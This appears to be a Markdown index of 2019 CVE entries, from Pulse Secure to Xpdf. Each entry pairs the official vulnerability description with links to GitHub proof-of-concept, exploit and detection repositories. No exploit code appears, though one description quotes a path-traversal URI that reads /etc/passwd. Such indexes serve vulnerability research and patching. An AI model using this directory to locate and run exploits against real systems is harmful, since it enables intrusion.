### CVE-2019-11510 (2019-05-08)
In Pulse Secure Pulse Connect Secure (PCS) 8.2 before 8.2R12.1, 8.3 before 8.3R7.1, and 9.0 before 9.0R3.4, an unauthenticated remote attacker can send a specially crafted URI to perform an arbitrary file reading vulnerability .
- [projectzeroindia/CVE-2019-11510](https://github.com/projectzeroindia/CVE-2019-11510)
- [nuc13us/Pulse](https://github.com/nuc13us/Pulse)
- [imjdl/CVE-2019-11510-poc](https://github.com/imjdl/CVE-2019-11510-poc)
- [es0/CVE-2019-11510_poc](https://github.com/es0/CVE-2019-11510_poc)
- [r00tpgp/http-pulse_ssl_vpn.nse](https://github.com/r00tpgp/http-pulse_ssl_vpn.nse)
- [jas502n/CVE-2019-11510-1](https://github.com/jas502n/CVE-2019-11510-1)
- [jason3e7/CVE-2019-11510](https://github.com/jason3e7/CVE-2019-11510)
- [BishopFox/pwn-pulse](https://github.com/BishopFox/pwn-pulse)
- [aqhmal/pulsexploit](https://github.com/aqhmal/pulsexploit)
- [cisagov/check-your-pulse](https://github.com/cisagov/check-your-pulse)
- [andripwn/pulse-exploit](https://github.com/andripwn/pulse-exploit)
- [pwn3z/CVE-2019-11510-PulseVPN](https://github.com/pwn3z/CVE-2019-11510-PulseVPN)
- [34zY/APT-Backpack](https://github.com/34zY/APT-Backpack)
### CVE-2019-11523 (2019-06-06)
Anviz Global M3 Outdoor RFID Access Control executes any command received from any source. No authentication/encryption is done. Attackers can fully interact with the device: for example, send the "open door" command, download the users list (which includes RFID codes and passcodes in cleartext), or update/create users. The same attack can be executed on a local network and over the internet (if the device is exposed on a public IP address).
- [wizlab-it/anviz-m3-rfid-cve-2019-11523-poc](https://github.com/wizlab-it/anviz-m3-rfid-cve-2019-11523-poc)
### CVE-2019-11539 (2019-04-26)
In Pulse Secure Pulse Connect Secure version 9.0RX before 9.0R3.4, 8.3RX before 8.3R7.1, 8.2RX before 8.2R12.1, and 8.1RX before 8.1R15.1 and Pulse Policy Secure version 9.0RX before 9.0R3.2, 5.4RX before 5.4R7.1, 5.3RX before 5.3R12.1, 5.2RX before 5.2R12.1, and 5.1RX before 5.1R15.1, the admin web interface allows an authenticated attacker to inject and execute commands.
- [0xDezzy/CVE-2019-11539](https://github.com/0xDezzy/CVE-2019-11539)
### CVE-2019-11580 (2019-06-03)
Atlassian Crowd and Crowd Data Center had the pdkinstall development plugin incorrectly enabled in release builds. Attackers who can send unauthenticated or authenticated requests to a Crowd or Crowd Data Center instance can exploit this vulnerability to install arbitrary plugins, which permits remote code execution on systems running a vulnerable version of Crowd or Crowd Data Center. All versions of Crowd from version 2.1.0 before 3.0.5 (the fixed version for 3.0.x), from version 3.1.0 before 3.1.6 (the fixed version for 3.1.x), from version 3.2.0 before 3.2.8 (the fixed version for 3.2.x), from version 3.3.0 before 3.3.5 (the fixed version for 3.3.x), and from version 3.4.0 before 3.4.4 (the fixed version for 3.4.x) are affected by this vulnerability.
- [jas502n/CVE-2019-11580](https://github.com/jas502n/CVE-2019-11580)
- [shelld3v/CVE-2019-11580](https://github.com/shelld3v/CVE-2019-11580)
### CVE-2019-11581 (2019-08-09)
There was a server-side template injection vulnerability in Jira Server and Data Center, in the ContactAdministrators and the SendBulkMail actions. An attacker is able to remotely execute code on systems that run a vulnerable version of Jira Server or Data Center. All versions of Jira Server and Data Center from 4.4.0 before 7.6.14, from 7.7.0 before 7.13.5, from 8.0.0 before 8.0.3, from 8.1.0 before 8.1.2, and from 8.2.0 before 8.2.3 are affected by this vulnerability.
- [jas502n/CVE-2019-11581](https://github.com/jas502n/CVE-2019-11581)
- [kobs0N/CVE-2019-11581](https://github.com/kobs0N/CVE-2019-11581)
- [PetrusViet/CVE-2019-11581](https://github.com/PetrusViet/CVE-2019-11581)
### CVE-2019-11687 (2019-05-02)
An issue was discovered in the DICOM Part 10 File Format in the NEMA DICOM Standard 1995 through 2019b. The preamble of a DICOM file that complies with this specification can contain the header for an executable file, such as Portable Executable (PE) malware. This space is left unspecified so that dual-purpose files can be created. (For example, dual-purpose TIFF/DICOM files are used in digital whole slide imaging for applications in medicine.) To exploit this vulnerability, someone must execute a maliciously crafted file that is encoded in the DICOM Part 10 File Format. PE/DICOM files are executable even with the .dcm file extension. Anti-malware configurations at healthcare facilities often ignore medical imagery. Also, anti-malware tools and business processes could violate regulatory frameworks (such as HIPAA) when processing suspicious DICOM files.
- [kosmokato/bad-dicom](https://github.com/kosmokato/bad-dicom)
### CVE-2019-11707 (2019-07-23)
A type confusion vulnerability can occur when manipulating JavaScript objects due to issues in Array.pop. This can allow for an exploitable crash. We are aware of targeted attacks in the wild abusing this flaw. This vulnerability affects Firefox ESR < 60.7.1, Firefox < 67.0.3, and Thunderbird < 60.7.2.
- [vigneshsrao/CVE-2019-11707](https://github.com/vigneshsrao/CVE-2019-11707)
- [flabbergastedbd/cve-2019-11707](https://github.com/flabbergastedbd/cve-2019-11707)
### CVE-2019-11708 (2019-07-23)
Insufficient vetting of parameters passed with the Prompt:Open IPC message between child and parent processes can result in the non-sandboxed parent process opening web content chosen by a compromised child process. When combined with additional vulnerabilities this could result in executing arbitrary code on the user's computer. This vulnerability affects Firefox ESR < 60.7.2, Firefox < 67.0.4, and Thunderbird < 60.7.2.
- [0vercl0k/CVE-2019-11708](https://github.com/0vercl0k/CVE-2019-11708)
### CVE-2019-11730 (2019-07-23)
A vulnerability exists where if a user opens a locally saved HTML file, this file can use file: URIs to access other files in the same directory or sub-directories if the names are known or guessed. The Fetch API can then be used to read the contents of any files stored in these directories and they may uploaded to a server. It was demonstrated that in combination with a popular Android messaging app, if a malicious HTML attachment is sent to a user and they opened that attachment in Firefox, due to that app's predictable pattern for locally-saved file names, it is possible to read attachments the victim received from other correspondents. This vulnerability affects Firefox ESR < 60.8, Firefox < 68, and Thunderbird < 60.8.
- [alidnf/CVE-2019-11730](https://github.com/alidnf/CVE-2019-11730)
### CVE-2019-11881 (2019-06-10)
A vulnerability exists in Rancher 2.1.4 in the login component, where the errorMsg parameter can be tampered to display arbitrary content, filtering tags but not special characters or symbols. There's no other limitation of the message, allowing malicious users to lure legitimate users to visit phishing sites with scare tactics, e.g., displaying a "This version of Rancher is outdated, please visit https://malicious.rancher.site/upgrading" message.
- [MauroEldritch/VanCleef](https://github.com/MauroEldritch/VanCleef)
### CVE-2019-11931 (2019-11-14)
A stack-based buffer overflow could be triggered in WhatsApp by sending a specially crafted MP4 file to a WhatsApp user. The issue was present in parsing the elementary stream metadata of an MP4 file and could result in a DoS or RCE. This affects Android versions prior to 2.19.274, iOS versions prior to 2.19.100, Enterprise Client versions prior to 2.25.3, Business for Android versions prior to 2.19.104 and Business for iOS versions prior to 2.19.100.
- [kasif-dekel/whatsapp-rce-patched](https://github.com/kasif-dekel/whatsapp-rce-patched)
- [nop-team/CVE-2019-11931](https://github.com/nop-team/CVE-2019-11931)
### CVE-2019-11932 (2019-10-03)
A double free vulnerability in the DDGifSlurp function in decoding.c in the android-gif-drawable library before version 1.2.18, as used in WhatsApp for Android before version 2.19.244 and many other Android applications, allows remote attackers to execute arbitrary code or cause a denial of service when the library is used to parse a specially crafted GIF image.
- [dorkerdevil/CVE-2019-11932](https://github.com/dorkerdevil/CVE-2019-11932)
- [awakened1712/CVE-2019-11932](https://github.com/awakened1712/CVE-2019-11932)
- [JasonJerry/WhatsRCE](https://github.com/JasonJerry/WhatsRCE)
- [TulungagungCyberLink/CVE-2019-11932](https://github.com/TulungagungCyberLink/CVE-2019-11932)
- [infiniteLoopers/CVE-2019-11932](https://github.com/infiniteLoopers/CVE-2019-11932)
- [valbrux/CVE-2019-11932-SupportApp](https://github.com/valbrux/CVE-2019-11932-SupportApp)
- [fastmo/CVE-2019-11932](https://github.com/fastmo/CVE-2019-11932)
- [mRanonyMousTZ/CVE-2019-11932-whatsApp-exploit](https://github.com/mRanonyMousTZ/CVE-2019-11932-whatsApp-exploit)
- [SmoZy92/CVE-2019-11932](https://github.com/SmoZy92/CVE-2019-11932)
- [dashtic172/https-github.com-awakened171](https://github.com/dashtic172/https-github.com-awakened171)
- [Err0r-ICA/WhatsPayloadRCE](https://github.com/Err0r-ICA/WhatsPayloadRCE)
- [starling021/CVE-2019-11932-SupportApp](https://github.com/starling021/CVE-2019-11932-SupportApp)
- [primebeast/CVE-2019-11932](https://github.com/primebeast/CVE-2019-11932)
- [BadAssAiras/hello](https://github.com/BadAssAiras/hello)
- [kal1gh0st/WhatsAppHACK-RCE](https://github.com/kal1gh0st/WhatsAppHACK-RCE)
- [zxn1/CVE-2019-11932](https://github.com/zxn1/CVE-2019-11932)
- [k3vinlusec/WhatsApp-Double-Free-Vulnerability_CVE-2019-11932](https://github.com/k3vinlusec/WhatsApp-Double-Free-Vulnerability_CVE-2019-11932)
- [Tabni/https-github.com-awakened1712-CVE-2019-11932](https://github.com/Tabni/https-github.com-awakened1712-CVE-2019-11932)
- [0759104103/cd-CVE-2019-11932](https://github.com/0759104103/cd-CVE-2019-11932)
- [tucommenceapousser/CVE-2019-11932](https://github.com/tucommenceapousser/CVE-2019-11932)
- [tucommenceapousser/CVE-2019-11932deta](https://github.com/tucommenceapousser/CVE-2019-11932deta)
### CVE-2019-11933 (2019-10-23)
A heap buffer overflow bug in libpl_droidsonroids_gif before 1.2.19, as used in WhatsApp for Android before version 2.19.291 could allow remote attackers to execute arbitrary code or cause a denial of service.
- [NatleoJ/CVE-2019-11933](https://github.com/NatleoJ/CVE-2019-11933)
- [KISH84172/CVE-2019-11933](https://github.com/KISH84172/CVE-2019-11933)
### CVE-2019-12086 (2019-05-17)
A Polymorphic Typing issue was discovered in FasterXML jackson-databind 2.x before 2.9.9. When Default Typing is enabled (either globally or for a specific property) for an externally exposed JSON endpoint, the service has the mysql-connector-java jar (8.0.14 or earlier) in the classpath, and an attacker can host a crafted MySQL server reachable by the victim, an attacker can send a crafted JSON message that allows them to read arbitrary local files on the server. This occurs because of missing com.mysql.cj.jdbc.admin.MiniAdmin validation.
- [motoyasu-saburi/CVE-2019-12086-jackson-databind-file-read](https://github.com/motoyasu-saburi/CVE-2019-12086-jackson-databind-file-read)
- [Al1ex/CVE-2019-12086](https://github.com/Al1ex/CVE-2019-12086)
### CVE-2019-12169 (2019-06-03)
ATutor 2.2.4 allows Arbitrary File Upload and Directory Traversal, resulting in remote code execution via a ".." pathname in a ZIP archive to the mods/_core/languages/language_import.php (aka Import New Language) or mods/_standard/patcher/index_admin.php (aka Patcher) component.
- [fuzzlove/ATutor-2.2.4-Language-Exploit](https://github.com/fuzzlove/ATutor-2.2.4-Language-Exploit)
### CVE-2019-12170 (2019-05-17)
ATutor through 2.2.4 is vulnerable to arbitrary file uploads via the mods/_core/backups/upload.php (aka backup) component. This may result in remote command execution. An attacker can use the instructor account to fully compromise the system using a crafted backup ZIP archive. This will allow for PHP files to be written to the web root, and for code to execute on the remote server.
- [fuzzlove/ATutor-Instructor-Backup-Arbitrary-File](https://github.com/fuzzlove/ATutor-Instructor-Backup-Arbitrary-File)
### CVE-2019-12180 (2020-02-05)
An issue was discovered in SmartBear ReadyAPI through 2.8.2 and 3.0.0 and SoapUI through 5.5. When opening a project, the Groovy "Load Script" is automatically executed. This allows an attacker to execute arbitrary Groovy Language code (Java scripting language) on the victim machine by inducing it to open a malicious Project. The same issue is present in the "Save Script" function, which is executed automatically when saving a project.
- [0x-nope/CVE-2019-12180](https://github.com/0x-nope/CVE-2019-12180)
### CVE-2019-12181 (2019-06-17)
A privilege escalation vulnerability exists in SolarWinds Serv-U before 15.1.7 for Linux.
- [mavlevin/CVE-2019-12181](https://github.com/mavlevin/CVE-2019-12181)
### CVE-2019-12185 (2019-05-19)
eLabFTW 1.8.5 is vulnerable to arbitrary file uploads via the /app/controllers/EntityController.php component. This may result in remote command execution. An attacker can use a user account to fully compromise the system using a POST request. This will allow for PHP files to be written to the web root, and for code to execute on the remote server.
- [fuzzlove/eLabFTW-1.8.5-EntityController-Arbitrary-File-Upload-RCE](https://github.com/fuzzlove/eLabFTW-1.8.5-EntityController-Arbitrary-File-Upload-RCE)
### CVE-2019-12189 (2019-05-21)
An issue was discovered in Zoho ManageEngine ServiceDesk Plus 9.3. There is XSS via the SearchN.do search field.
- [falconz/CVE-2019-12189](https://github.com/falconz/CVE-2019-12189)
### CVE-2019-12255 (2019-08-09)
Wind River VxWorks has a Buffer Overflow in the TCP component (issue 1 of 4). This is a IPNET security vulnerability: TCP Urgent Pointer = 0 that leads to an integer underflow.
- [sud0woodo/Urgent11-Suricata-LUA-scripts](https://github.com/sud0woodo/Urgent11-Suricata-LUA-scripts)
### CVE-2019-12272 (2019-05-23)
In OpenWrt LuCI through 0.10, the endpoints admin/status/realtime/bandwidth_status and admin/status/realtime/wireless_status of the web application are affected by a command injection vulnerability.
- [HACHp1/LuCI_RCE_exp](https://github.com/HACHp1/LuCI_RCE_exp)
- [nevercodecorrect/lede-17.01.3](https://github.com/nevercodecorrect/lede-17.01.3)
### CVE-2019-12314 (2019-05-24)
Deltek Maconomy 2.2.5 is prone to local file inclusion via absolute path traversal in the WS.macx1.W_MCS/ PATH_INFO, as demonstrated by a cgi-bin/Maconomy/MaconomyWS.macx1.W_MCS/etc/passwd URI.
- [ras313/CVE-2019-12314](https://github.com/ras313/CVE-2019-12314)
### CVE-2019-12384 (2019-06-24)
FasterXML jackson-databind 2.x before 2.9.9.1 might allow attackers to have a variety of impacts by leveraging failure to block the logback-core class from polymorphic deserialization. Depending on the classpath content, remote code execution may be possible.
- [jas502n/CVE-2019-12384](https://github.com/jas502n/CVE-2019-12384)
- [MagicZer0/Jackson_RCE-CVE-2019-12384](https://github.com/MagicZer0/Jackson_RCE-CVE-2019-12384)
### CVE-2019-12409 (2019-11-18)
The 8.1.1 and 8.2.0 releases of Apache Solr contain an insecure setting for the ENABLE_REMOTE_JMX_OPTS configuration option in the default solr.in.sh configuration file shipping with Solr. If you use the default solr.in.sh file from the affected releases, then JMX monitoring will be enabled and exposed on RMI_PORT (default=18983), without any authentication. If this port is opened for inbound traffic in your firewall, then anyone with network access to your Solr nodes will be able to access JMX, which may in turn allow them to upload malicious code for execution on the Solr server.
- [jas502n/CVE-2019-12409](https://github.com/jas502n/CVE-2019-12409)
### CVE-2019-12453 (2019-07-19)
In MicroStrategy Web before 10.1 patch 10, stored XSS is possible in the FLTB parameter due to missing input validation.
- [undefinedmode/CVE-2019-12453](https://github.com/undefinedmode/CVE-2019-12453)
### CVE-2019-12460 (2019-05-30)
Web Port 1.19.1 allows XSS via the /access/setup type parameter.
- [EmreOvunc/WebPort-v1.19.1-Reflected-XSS](https://github.com/EmreOvunc/WebPort-v1.19.1-Reflected-XSS)
### CVE-2019-12475 (2019-07-17)
In MicroStrategy Web before 10.4.6, there is stored XSS in metric due to insufficient input validation.
- [undefinedmode/CVE-2019-12475](https://github.com/undefinedmode/CVE-2019-12475)
### CVE-2019-12476 (2019-06-17)
An authentication bypass vulnerability in the password reset functionality in Zoho ManageEngine ADSelfService Plus before 5.0.6 allows an attacker with physical access to gain a shell with SYSTEM privileges via the restricted thick client browser. The attack uses a long sequence of crafted keyboard input.
- [0katz/CVE-2019-12476](https://github.com/0katz/CVE-2019-12476)
### CVE-2019-12489 (2019-11-26)
An issue was discovered on Fastweb Askey RTV1907VW 0.00.81_FW_200_Askey 2018-10-02 18:08:18 devices. By using the usb_remove service through an HTTP request, it is possible to inject and execute a command between two & characters in the mount parameter.
- [garis/Fastgate](https://github.com/garis/Fastgate)
### CVE-2019-12538 (2019-06-05)
An issue was discovered in Zoho ManageEngine ServiceDesk Plus 9.3. There is XSS via the SiteLookup.do search field.
- [tarantula-team/CVE-2019-12538](https://github.com/tarantula-team/CVE-2019-12538)
### CVE-2019-12541 (2019-06-05)
An issue was discovered in Zoho ManageEngine ServiceDesk Plus 9.3. There is XSS via the SolutionSearch.do searchText parameter.
- [tarantula-team/CVE-2019-12541](https://github.com/tarantula-team/CVE-2019-12541)
### CVE-2019-12542 (2019-06-05)
An issue was discovered in Zoho ManageEngine ServiceDesk Plus 9.3. There is XSS via the SearchN.do userConfigID parameter.
- [tarantula-team/CVE-2019-12542](https://github.com/tarantula-team/CVE-2019-12542)
### CVE-2019-12543 (2019-06-05)
An issue was discovered in Zoho ManageEngine ServiceDesk Plus 9.3. There is XSS via the PurchaseRequest.do serviceRequestId parameter.
- [tarantula-team/CVE-2019-12543](https://github.com/tarantula-team/CVE-2019-12543)
### CVE-2019-12562 (2019-09-26)
Stored Cross-Site Scripting in DotNetNuke (DNN) Version before 9.4.0 allows remote attackers to store and embed the malicious script into the admin notification page. The exploit could be used to perfom any action with admin privileges such as managing content, adding users, uploading backdoors to the server, etc. Successful exploitation occurs when an admin user visits a notification page with stored cross-site scripting.
- [MAYASEVEN/CVE-2019-12562](https://github.com/MAYASEVEN/CVE-2019-12562)
### CVE-2019-12586 (2019-09-04)
The EAP peer implementation in Espressif ESP-IDF 2.0.0 through 4.0.0 and ESP8266_NONOS_SDK 2.2.0 through 3.1.0 processes EAP Success messages before any EAP method completion or failure, which allows attackers in radio range to cause a denial of service (crash) via a crafted message.
- [Matheus-Garbelini/esp32_esp8266_attacks](https://github.com/Matheus-Garbelini/esp32_esp8266_attacks)
### CVE-2019-12594 (2019-07-02)
DOSBox 0.74-2 has Incorrect Access Control.
- [Alexandre-Bartel/CVE-2019-12594](https://github.com/Alexandre-Bartel/CVE-2019-12594)
### CVE-2019-12616 (2019-06-05)
An issue was discovered in phpMyAdmin before 4.9.0. A vulnerability was found that allows an attacker to trigger a CSRF attack against a phpMyAdmin user. The attacker can trick the user, for instance through a broken <img> tag pointing at the victim's phpMyAdmin database, and the attacker can potentially deliver a payload (such as a specific INSERT or DELETE statement) to the victim.
- [Cappricio-Securities/CVE-2019-12616](https://github.com/Cappricio-Securities/CVE-2019-12616)
### CVE-2019-12725 (2019-07-19)
Zeroshell 3.9.0 is prone to a remote command execution vulnerability. Specifically, this issue occurs because the web application mishandles a few HTTP parameters. An unauthenticated attacker can exploit this issue by injecting OS commands inside the vulnerable parameters.
- [givemefivw/CVE-2019-12725](https://github.com/givemefivw/CVE-2019-12725)
- [sma11new/PocList](https://github.com/sma11new/PocList)
- [hev0x/CVE-2019-12725-Command-Injection](https://github.com/hev0x/CVE-2019-12725-Command-Injection)
- [gougou123-hash/CVE-2019-12725](https://github.com/gougou123-hash/CVE-2019-12725)
### CVE-2019-12735 (2019-06-05)
getchar.c in Vim before 8.1.1365 and Neovim before 0.3.6 allows remote attackers to execute arbitrary OS commands via the :source! command in a modeline, as demonstrated by execute in Vim, and assert_fails or nvim_input in Neovim.
- [pcy190/ace-vim-neovim](https://github.com/pcy190/ace-vim-neovim)
- [oldthree3/CVE-2019-12735-VIM-NEOVIM](https://github.com/oldthree3/CVE-2019-12735-VIM-NEOVIM)
- [datntsec/CVE-2019-12735](https://github.com/datntsec/CVE-2019-12735)
- [nickylimjj/cve-2019-12735](https://github.com/nickylimjj/cve-2019-12735)
- [st9007a/CVE-2019-12735](https://github.com/st9007a/CVE-2019-12735)
### CVE-2019-12744 (2019-06-20)
SeedDMS before 5.1.11 allows Remote Command Execution (RCE) because of unvalidated file upload of PHP scripts, a different vulnerability than CVE-2018-12940.
- [nobodyatall648/CVE-2019-12744](https://github.com/nobodyatall648/CVE-2019-12744)
### CVE-2019-12750 (2019-07-31)
Symantec Endpoint Protection, prior to 14.2 RU1 & 12.1 RU6 MP10 and Symantec Endpoint Protection Small Business Edition, prior to 12.1 RU6 MP10c (12.1.7491.7002), may be susceptible to a privilege escalation vulnerability, which is a type of issue whereby an attacker may attempt to compromise the software application to gain elevated access to resources that are normally protected from an application or user.
- [v-p-b/cve-2019-12750](https://github.com/v-p-b/cve-2019-12750)
### CVE-2019-12796
- [PeterUpfold/CVE-2019-12796](https://github.com/PeterUpfold/CVE-2019-12796)
### CVE-2019-12814 (2019-06-19)
A Polymorphic Typing issue was discovered in FasterXML jackson-databind 2.x through 2.9.9. When Default Typing is enabled (either globally or for a specific property) for an externally exposed JSON endpoint and the service has JDOM 1.x or 2.x jar in the classpath, an attacker can send a specifically crafted JSON message that allows them to read arbitrary local files on the server.
- [Al1ex/CVE-2019-12814](https://github.com/Al1ex/CVE-2019-12814)
### CVE-2019-12815 (2019-07-19)
An arbitrary file copy vulnerability in mod_copy in ProFTPD up to 1.3.5b allows for remote code execution and information disclosure without authentication, a related issue to CVE-2015-3306.
- [KTN1990/CVE-2019-12815](https://github.com/KTN1990/CVE-2019-12815)
- [lcartey/proftpd-cve-2019-12815](https://github.com/lcartey/proftpd-cve-2019-12815)
### CVE-2019-12836 (2019-06-21)
The Bobronix JEditor editor before 3.0.6 for Jira allows an attacker to add a URL/Link (to an existing issue) that can cause forgery of a request to an out-of-origin domain. This in turn may allow for a forged request that can be invoked in the context of an authenticated user, leading to stealing of session tokens and account takeover.
- [9lyph/CVE-2019-12836](https://github.com/9lyph/CVE-2019-12836)
### CVE-2019-12840 (2019-06-15)
In Webmin through 1.910, any user authorized to the "Package Updates" module can execute arbitrary commands with root privileges via the data parameter to update.cgi.
- [bkaraceylan/CVE-2019-12840_POC](https://github.com/bkaraceylan/CVE-2019-12840_POC)
- [KrE80r/webmin_cve-2019-12840_poc](https://github.com/KrE80r/webmin_cve-2019-12840_poc)
- [anasbousselham/webminscan](https://github.com/anasbousselham/webminscan)
- [zAbuQasem/CVE-2019-12840](https://github.com/zAbuQasem/CVE-2019-12840)
- [WizzzStark/CVE-2019-12840.py](https://github.com/WizzzStark/CVE-2019-12840.py)
- [Pol-Ruiz/PoC-CVE-2019-12840](https://github.com/Pol-Ruiz/PoC-CVE-2019-12840)
### CVE-2019-12889 (2019-08-20)
An unauthenticated privilege escalation exists in SailPoint Desktop Password Reset 7.2. A user with local access to only the Windows logon screen can escalate their privileges to NT AUTHORITY\System. An attacker would need local access to the machine for a successful exploit. The attacker must disconnect the computer from the local network / WAN and connect it to an internet facing access point / network. At that point, the attacker can execute the password-reset functionality, which will expose a web browser. Browsing to a site that calls local Windows system functions (e.g., file upload) will expose the local file system. From there an attacker can launch a privileged command shell.
- [nulsect0r/CVE-2019-12889](https://github.com/nulsect0r/CVE-2019-12889)
### CVE-2019-12890 (2019-06-19)
RedwoodHQ 2.5.5 does not require any authentication for database operations, which allows remote attackers to create admin users via a con.automationframework users insert_one call.
- [EthicalHCOP/CVE-2019-12890_RedxploitHQ](https://github.com/EthicalHCOP/CVE-2019-12890_RedxploitHQ)
### CVE-2019-12937 (2019-06-23)
apps/gsudo.c in gsudo in ToaruOS through 1.10.9 has a buffer overflow allowing local privilege escalation to the root user via the DISPLAY environment variable.
- [AkashicYiTai/CVE-2019-12937-ToaruOS](https://github.com/AkashicYiTai/CVE-2019-12937-ToaruOS)
### CVE-2019-12949 (2019-06-25)
In pfSense 2.4.4-p2 and 2.4.4-p3, if it is possible to trick an authenticated administrator into clicking on a button on a phishing page, an attacker can leverage XSS to upload arbitrary executable code, via diag_command.php and rrd_fetch_json.php (timePeriod parameter), to a server. Then, the remote attacker can run any command with root privileges on that server.
- [tarantula-team/CVE-2019-12949](https://github.com/tarantula-team/CVE-2019-12949)
### CVE-2019-12999 (2020-01-31)
Lightning Network Daemon (lnd) before 0.7 allows attackers to trigger loss of funds because of Incorrect Access Control.
- [lightninglabs/chanleakcheck](https://github.com/lightninglabs/chanleakcheck)
### CVE-2019-13000 (2020-01-31)
Eclair through 0.3 allows attackers to trigger loss of funds because of Incorrect Access Control. NOTE: README.md states "it is beta-quality software and don't put too much money in it."
- [ACINQ/detection-tool-cve-2019-13000](https://github.com/ACINQ/detection-tool-cve-2019-13000)
### CVE-2019-13024 (2019-07-01)
Centreon 18.x before 18.10.6, 19.x before 19.04.3, and Centreon web before 2.8.29 allows the attacker to execute arbitrary system commands by using the value "init_script"-"Monitoring Engine Binary" in main.get.php to insert a arbitrary command into the database, and execute it by calling the vulnerable page www/include/configuration/configGenerate/xml/generateFiles.php (which passes the inserted value to the database to shell_exec without sanitizing it, allowing one to execute system arbitrary commands).
- [mhaskar/CVE-2019-13024](https://github.com/mhaskar/CVE-2019-13024)
- [get-get-get-get/Centreon-RCE](https://github.com/get-get-get-get/Centreon-RCE)
### CVE-2019-13025 (2019-10-02)
Compal CH7465LG CH7465LG-NCIP-6.12.18.24-5p8-NOSH devices have Incorrect Access Control because of Improper Input Validation. The attacker can send a maliciously modified POST (HTTP) request containing shell commands, which will be executed on the device, to an backend API endpoint of the cable modem.
- [x1tan/CVE-2019-13025](https://github.com/x1tan/CVE-2019-13025)
### CVE-2019-13027 (2019-07-12)
Realization Concerto Critical Chain Planner (aka CCPM) 5.10.8071 has SQL Injection in at least in the taskupdt/taskdetails.aspx webpage via the projectname parameter.
- [IckoGZ/CVE-2019-13027](https://github.com/IckoGZ/CVE-2019-13027)
### CVE-2019-13051 (2019-10-09)
Pi-Hole 4.3 allows Command Injection.
- [pr0tean/CVE-2019-13051](https://github.com/pr0tean/CVE-2019-13051)
### CVE-2019-13063 (2019-09-23)
Within Sahi Pro 8.0.0, an attacker can send a specially crafted URL to include any victim files on the system via the script parameter on the Script_view page. This will result in file disclosure (i.e., being able to pull any file from the remote victim application). This can be used to steal and obtain sensitive config and other files. This can result in complete compromise of the application. The script parameter is vulnerable to directory traversal and both local and remote file inclusion.
- [0x6b7966/CVE-2019-13063-POC](https://github.com/0x6b7966/CVE-2019-13063-POC)
### CVE-2019-13086 (2019-06-30)
core/MY_Security.php in CSZ CMS 1.2.2 before 2019-06-20 has member/login/check SQL injection by sending a crafted HTTP User-Agent header and omitting the csrf_csz parameter.
- [lingchuL/CVE_POC_test](https://github.com/lingchuL/CVE_POC_test)
### CVE-2019-13101 (2019-08-08)
An issue was discovered on D-Link DIR-600M 3.02, 3.03, 3.04, and 3.06 devices. wan.htm can be accessed directly without authentication, which can lead to disclosure of information about the WAN, and can also be leveraged by an attacker to modify the data fields of the page.
- [halencarjunior/dlkploit600](https://github.com/halencarjunior/dlkploit600)
### CVE-2019-13115 (2019-07-16)
In libssh2 before 1.9.0, kex_method_diffie_hellman_group_exchange_sha256_key_exchange in kex.c has an integer overflow that could lead to an out-of-bounds read in the way packets are read from the server. A remote attacker who compromises a SSH server may be able to disclose sensitive information or cause a denial of service condition on the client system when a user connects to the server. This is related to an _libssh2_check_length mistake, and is different from the various issues fixed in 1.8.1, such as CVE-2019-3855.
- [viz27/Libssh2-Exploit](https://github.com/viz27/Libssh2-Exploit)
- [CSSProject/libssh2-Exploit](https://github.com/CSSProject/libssh2-Exploit)
### CVE-2019-13143 (2019-08-06)
An HTTP parameter pollution issue was discovered on Shenzhen Dragon Brothers Fingerprint Bluetooth Round Padlock FB50 2.3. With the user ID, user name, and the lock's MAC address, anyone can unbind the existing owner of the lock, and bind themselves instead. This leads to complete takeover of the lock. The user ID, name, and MAC address are trivially obtained from APIs found within the Android or iOS application. With only the MAC address of the lock, any attacker can transfer ownership of the lock from the current user, over to the attacker's account. Thus rendering the lock completely inaccessible to the current user.
- [securelayer7/pwnfb50](https://github.com/securelayer7/pwnfb50)
### CVE-2019-13144 (2019-07-05)
myTinyTodo 1.3.3 through 1.4.3 allows CSV Injection. This is fixed in 1.5.
- [cccaaasser/CVE-2019-13144](https://github.com/cccaaasser/CVE-2019-13144)
### CVE-2019-13272 (2019-07-17)
In the Linux kernel before 5.1.17, ptrace_link in kernel/ptrace.c mishandles the recording of the credentials of a process that wants to create a ptrace relationship, which allows local users to obtain root access by leveraging certain scenarios with a parent-child process relationship, where a parent drops privileges and calls execve (potentially allowing control by an attacker). One contributing factor is an object lifetime issue (which can also cause a panic). Another contributing factor is incorrect marking of a ptrace relationship as privileged, which is exploitable through (for example) Polkit's pkexec helper with PTRACE_TRACEME. NOTE: SELinux deny_ptrace might be a usable workaround in some environments.
- [jas502n/CVE-2019-13272](https://github.com/jas502n/CVE-2019-13272)
- [Cyc1eC/CVE-2019-13272](https://github.com/Cyc1eC/CVE-2019-13272)
- [bigbigliang-malwarebenchmark/cve-2019-13272](https://github.com/bigbigliang-malwarebenchmark/cve-2019-13272)
- [oneoy/CVE-2019-13272](https://github.com/oneoy/CVE-2019-13272)
- [polosec/CVE-2019-13272](https://github.com/polosec/CVE-2019-13272)
- [sumedhaDharmasena/-Kernel-ptrace-c-mishandles-vulnerability-CVE-2019-13272](https://github.com/sumedhaDharmasena/-Kernel-ptrace-c-mishandles-vulnerability-CVE-2019-13272)
- [Tharana/Exploiting-a-Linux-kernel-vulnerability](https://github.com/Tharana/Exploiting-a-Linux-kernel-vulnerability)
- [RashmikaEkanayake/Privilege-Escalation-CVE-2019-13272-](https://github.com/RashmikaEkanayake/Privilege-Escalation-CVE-2019-13272-)
- [Tharana/vulnerability-exploitation](https://github.com/Tharana/vulnerability-exploitation)
- [teddy47/CVE-2019-13272---Documentation](https://github.com/teddy47/CVE-2019-13272---Documentation)
- [datntsec/CVE-2019-13272](https://github.com/datntsec/CVE-2019-13272)
- [jana30116/CVE-2019-13272-Local-Privilege-Escalation](https://github.com/jana30116/CVE-2019-13272-Local-Privilege-Escalation)
- [babyshen/CVE-2019-13272](https://github.com/babyshen/CVE-2019-13272)
- [GgKendall/secureCodingDemo](https://github.com/GgKendall/secureCodingDemo)
- [asepsaepdin/CVE-2019-13272](https://github.com/asepsaepdin/CVE-2019-13272)
- [MDS1GNAL/ptrace_scope-CVE-2019-13272-privilege-escalation](https://github.com/MDS1GNAL/ptrace_scope-CVE-2019-13272-privilege-escalation)
- [josemlwdf/CVE-2019-13272](https://github.com/josemlwdf/CVE-2019-13272)
### CVE-2019-13288 (2019-07-04)
In Xpdf 4.01.01, the Parser::getObj() function in Parser.cc may cause infinite recursion via a crafted file. A remote attacker can leverage this for a DoS attack. This is similar to CVE-2018-16646.
